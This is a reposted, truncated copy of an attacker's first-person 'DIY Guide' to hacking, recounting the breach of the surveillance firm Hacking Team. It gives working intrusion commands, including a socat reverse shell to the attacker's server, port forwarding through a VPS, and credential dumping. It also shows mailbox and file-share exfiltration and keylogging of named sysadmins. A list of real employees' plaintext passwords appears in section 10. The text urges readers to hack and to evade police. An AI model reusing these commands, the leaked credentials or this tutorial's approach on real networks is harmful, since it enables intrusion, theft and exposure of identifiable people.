Read more: http://www.itworld.co.kr/news/91449#csidxb37c22aecfb0bf2b0ad1971822b4b72
Copyright © LinkBack

 Posted by at 8:45 PM

세상을 떠들썩하게 했던 해킹팀, 어떻게 해킹됐나?

 정보보호  Comments Off on 세상을 떠들썩하게 했던 해킹팀, 어떻게 해킹됐나?
Apr 272016
 

 

 

                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                                                 
                                  A DIY Guide



                                 ,-._,-._             
                              _,-\  o O_/;            
                             / ,  `     `|            
                             | \-.,___,  /   `        
                              \ `-.__/  /    ,.\      
                             / `-.__.-\`   ./   \'
                            / /|    ___\ ,/      `\
                           ( ( |.-"`   '/\         \  `
                            \ \/      ,,  |          \ _
                             \|     o/o   /           \.
                              \        , /             /
                              ( __`;-;'__`)            \\
                              `//'`   `||`              `\
                             _//       ||           __   _   _ _____   __
                     .-"-._,(__)     .(__).-""-.      | | | | |_   _| |
                    /          \    /           \     | | |_| | | |   |
                    \          /    \           /     | |  _  | | |   |
                     `'-------`      `--------'`    __| |_| |_| |_|   |__
                               #antisec



--[ 1 - Introduction ]----------------------------------------------------------

You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf 
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


--[ 3 - Stay safe out there ]---------------------------------------------------

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

   I guess when the police arrive to seize your computer, it means you've
   already made a lot of mistakes, but it's better to be safe.

2) Use a virtual machine with all traffic routed through Tor

   This accomplishes two things. First, all your traffic is anonymized through
   Tor. Second, keeping your personal life and your hacking on separate
   computers helps you not to mix them by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
   something custom [6]. Here's [7] a detailed comparison.

3) (Optional) Don't connect directly to Tor
   
   Tor isn't a panacea. They can correlate the times you're connected to Tor
   with the times your hacker handle is active. Also, there have been
   successful attacks against Tor [8]. You can connect to Tor using other
   peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
   cracking wifi. Another option is to connect to a VPN or a bridge node [10]
   before Tor, but that's less secure because they can still correlate the
   hacker's activity with your house's internet activity (this was used as
   evidence against Jeremy Hammond [11]).

   The reality is that while Tor isn't perfect, it works quite well. When I
   was young and reckless, I did plenty of stuff without any protection (I'm
   referring to hacking) apart from Tor, that the police tried their hardest
   to investigate, and I've never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


----[ 3.1 - Infrastructure ]----------------------------------------------------

I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

   For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

   For use as C&C servers, to receive connect-back shells, to launch attacks,
   and to store the loot.

3) Hacked Servers

   For use as pivots to hide the IP addresses of the stable servers. And for
   when I want a fast connection without pivoting, for example to scan ports,
   scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).


----[ 3.2 - Attribution ]-------------------------------------------------------

In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.

I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.


--[ 4 - Information Gathering ]-------------------------------------------------

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.


----[ 4.1 - Technical Information ]---------------------------------------------

Some tools and techniques are:

1) Google

   A lot of interesting things can be found with a few well-chosen search
   queries. For example, the identity of DPR [1]. The bible of Google hacking
   is the book "Google Hacking for Penetration Testers". You can find a short
   summary in Spanish at [2].

2) Subdomain Enumeration

   Often, a company's main website is hosted by a third party, and you'll find
   the company's actual IP range thanks to subdomains like mx.company.com or
   ns1.company.com. Also, sometimes there are things that shouldn't be exposed
   in "hidden" subdomains. Useful tools for discovering domains and subdomains
   are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

   With a reverse lookup using the whois information from a domain or IP range
   of a company, you can find other domains and IP ranges. As far as I know,
   there's no free way to do reverse lookups aside from a google "hack":
   
   "via della moscova 13" site:www.findip-address.com
   "via della moscova 13" site:domaintools.com

4) Port scanning and fingerprinting

   Unlike the other techniques, this talks to the company's servers. I
   include it in this section because it's not an attack, it's just
   information gathering. The company's IDS might generate an alert, but you
   don't have to worry since the whole internet is being scanned constantly.

   For scanning, nmap [6] is precise, and can fingerprint the majority of
   services discovered. For companies with very large IP ranges, zmap [7] or
   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
   sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


----[ 4.2 - Social Information ]------------------------------------------------

For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

   Here as well, it's the most useful tool.

2) theHarvester and recon-ng

   I already mentioned them in the previous section, but they have a lot more
   functionality. They can find a lot of information quickly and
   automatically. It's worth reading all their documentation.

3) LinkedIn

   A lot of information about the employees can be found here. The company's
   recruiters are the most likely to accept your connection requests.

4) Data.com

   Previously known as jigsaw. They have contact information for many
   employees.

5) File Metadata

   A lot of information about employees and their systems can be found in
   metadata of files the company has published. Useful tools for finding
   files on the company's website and extracting the metadata are metagoofil
   [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


--[ 5 - Entering the network ]--------------------------------------------------

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.


----[ 5.1 - Social Engineering ]------------------------------------------------

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


----[ 5.2 - Buying Access ]-----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.


----[ 5.3 - Technical Exploitation ]--------------------------------------------

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum:        93.62.139.32 - 93.62.139.47
descr:          HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


--[ 6 - Be Prepared ]-----------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

   For all the standard Unix utilities that the system didn't have.

2) nmap

   To scan and fingerprint Hacking Team's internal network.

3) Responder.py

   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.

4) Python

   To execute Responder.py

5) tcpdump

   For sniffing traffic.

6) dsniff

   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
   and NaGA, but it was hard to compile it for the system.

7) socat

   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
		  tcp:my_server:my_port

   And useful for a lot more, it's a networking swiss army knife. See the
   examples section of its documentation.

8) screen

   Like the shell with pty, it wasn't really necessary, but I wanted to feel
   at home in Hacking Team's network.

9) a SOCKS proxy server

   To use with proxychains to be able to access their local network from any
   program.

10) tgcd

   For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.


--[ 7 - Watch and Listen ]------------------------------------------------------

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.


--[ 8 - NoSQL Databases ]-------------------------------------------------------

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_    version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


--[ 9 - Crossed Cables ]--------------------------------------------------------

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


--[ 10 - From backups to domain admin ]-----------------------------------------

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      <---- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


--[ 11 - Downloading the mail ]-------------------------------------------------

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


--[ 12 - Downloading Files ]----------------------------------------------------

Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.


--[ 13 - Introduction to hacking windows domains ]------------------------------

Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.


----[ 13.1 - Lateral Movement ]-------------------------------------------------

I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote Movement:

1) psexec

   The tried and true method for lateral movement on windows. You can use
   psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
   invoke_psexec [4], or the builtin windows command "sc" [5]. For the
   metasploit module, powershell empire, and pth-winexe [6], you just need the
   hash, not the password. It's the most universal method (it works on any
   windows computer with port 445 open), but it's also the least stealthy.
   Event type 7045 "Service Control Manager" will appear in the event logs. In
   my experience, no one has ever noticed during a hack, but it helps the
   investigators piece together what the hacker did afterwards.

2) WMI

   The most stealthy method. The WMI service is enabled on all windows
   computers, but except for servers, the firewall blocks it by default. You
   can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
   pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
   wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

   It's disabled by default, and I don't recommend enabling new protocols.
   But, if the sysadmin has already enabled it, it's very convenient,
   especially if you use powershell for everything (and you should use
   powershell for almost everything, it will change [11] with powershell 5 and
   windows 10, but for now powershell makes it easy to do everything in RAM,
   avoid AV, and leave a small footprint)

4) Scheduled Tasks

   You can execute remote programs with at and schtasks [5]. It works in the
   same situations where you could use psexec, and it also leaves a well known
   footprint [12].

5) GPO

   If all those protocols are disabled or blocked by the firewall, once you're
   Domain Admin, you can use GPO to give users a login script, install an msi,
   execute a scheduled task [13], or, like we'll see with the computer of
   Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
   open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


"In place" Movement:

1) Token Stealing

   Once you have admin access on a computer, you can use the tokens of the
   other users to access resources in the domain. Two tools for doing this are
   incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

   You can take advantage of a validation bug in Kerberos to generate Domain
   Admin tickets [3][4][5].

3) Pass the Hash

   If you have a user's hash, but they're not logged in, you can use
   sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

   Any RAT can inject itself into other processes. For example, the migrate
   command in meterpreter and pupy [6], or the psinject [7] command in
   powershell empire. You can inject into the process that has the token you
   want.

5) runas

   This is sometimes very useful since it doesn't require admin privileges.
   The command is part of windows, but if you don't have a GUI you can use
   powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]------------------------------------------------------

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]------------------------------------------

The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:

1) Downloading a list of file names

   With a Domain Admin account, you can download a list of all filenames in
   the network with powerview:

   Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
   select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
   select fullname | out-file -append files.txt}

   Later, you can read it at your leisure and choose which files to download.

2) Reading email

   As we've already seen, you can download email with powershell, and it has a
   lot of useful information.

3) Reading sharepoint

   It's another place where many businesses store a lot of important
   information. It can also be downloaded with powershell [10].

4) Active Directory [11]

   It has a lot of useful information about users and computers. Without being
   Domain Admin, you can already get a lot of info with powerview and other
   tools [12]. After getting Domain Admin, you should export all the AD
   information with csvde or another tool.

5) Spy on the employees

   One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
   (one of Hacking Team's sysadmins) gave me access to a Nagios server which
   gave me access to the rete sviluppo (development network with the source
   code of RCS). With a simple combination of Get-Keystrokes and
   Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
   [14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
